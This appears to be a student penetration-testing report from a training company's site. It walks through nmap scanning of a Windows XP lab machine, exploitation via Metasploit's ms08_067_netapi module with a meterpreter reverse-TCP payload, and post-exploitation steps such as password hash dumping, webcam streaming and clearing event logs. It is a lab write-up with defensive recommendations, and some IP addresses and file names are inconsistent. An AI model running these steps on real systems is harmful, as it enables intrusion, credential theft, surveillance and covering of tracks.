Vulnerability Assessment & Penetration Testing Report on Windows XP 2003 | ICSS Student – Shivanshi Sinha

Vulnerability Scanning

Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes. A vulnerability scan detects and classifies system weaknesses in computers, networks and communications equipment and predicts the effectiveness of countermeasures.

 

Vulnerability Assessment & Penetration Testing Report on Windows XP 2003 done by ICSS Student Shivanshi Sinha. The full project discussed below:

 

Assessment Vulnerability & Penetration Testing Report on Windows XP 2003

 

Project Name: Vulnerability AssessmentPenetration testing on Windows XP 2003

Author Name: Shivanshi Sinha

Publish Date:  24-07-2018

 

Table of  Contents

 

 

Reconnaissance

Vulnerability Scanning

Attack and Penetration

Post-Exploitation

Solution & Recommendation

 

Reconnaissance

 

First and foremost we  gather  information about the target machine  which we have chosen  to be  Windows-XP 2003 machine. The target machine is on the same  network as the remote host.

After running Nmap scan we see all the live hosts and the command is given below.

  • nmap -sV  -sP  168.43.1/24

Now, the seperated live ip address which is required is saved in a text file using the command given below :

  • nmap -sV  -sP  168.43.1/24 > nmap.txt
  • cat host.txt | grep “for” | cut –d “ “ –f5 > ip.txt

 

Vulnerability Scanning

 

Vulnerability Scanning

 

 

Then  Windows-XP machine is searched by running the script to detect the OS of all the live ip’s.

  • nmap -sV  -O –iL ip.txt > ss.txt

After searching the target  , we will move to the next step.

 

 

Vulnerability  Scanning

Known vulnerabilities are checked in the searched target. A  nmap scan is run to  detect the vulnerability in the target.

  • nmap -Pn  -script  vuln 192.168.174.130

Text file is saved.

  • nmap -Pn  -script  vuln  168.174.130 > bst.txt

 

Windows-XP 2003

 

After scanning we find that the Windows-XP 2003 machine is vulnerable to the vulnerability ms08_067.

Now metasploit is used to exploit .

 

 

Attack and Penetration

Msfconsole is used. Hackers all around use metasploit framework that has a huge collection of exploits,payloads and modules .

  • Sudo msfconsole

vulnerability

 

Now we will search for the ms08_067 vulnerability.

  • Search ms08_067

 

ms08_067

 

Now  the following commands are to be executed :

  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi

Now we  see the list of payloads that can perform the attack.

  • show payloads

The payload used – windows/meterpreter/reverse_tcp.

  • set payload windows/meterpreter/reverse_tcp
  • show options

 

payload

 

The lhost and rhost is set.

  • set rhost 192.168.174.130
  • set lhost 192.168.43.11

 

lhost

 

 

Post-Exploitation

After getting the meterpreter session, now we can perform following tasks :

  • getsystem
  • sysinfo
  • getuid
  • hashdump
  • webcam_stream
  • download
  • cd
  • ls
  • reboot

To clear the footprints  we use

  • clearev

 

SOLUTIONS  &  RECOMMENDATIONS

 

  • It is important to delete  all  traces  of  your  personal  information if planning to sell hardware.
  • Operating system  and  other  software  should  be  updated  This way  hackers can  be  prevented  from  accessing  computers  through  vulnerabilities in   outdated   programs.
  • Attacks can be minimized by keeping the  antivirus  and  anti-malware ,anti-spyware  and  firewall
  • System becomes pone to hacking if connected to open wifi . Vulnerabilities of some  routers  can  never  be  Encrypted  passwords are required to protect the wifi.

 

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 


Show Buttons
Hide Buttons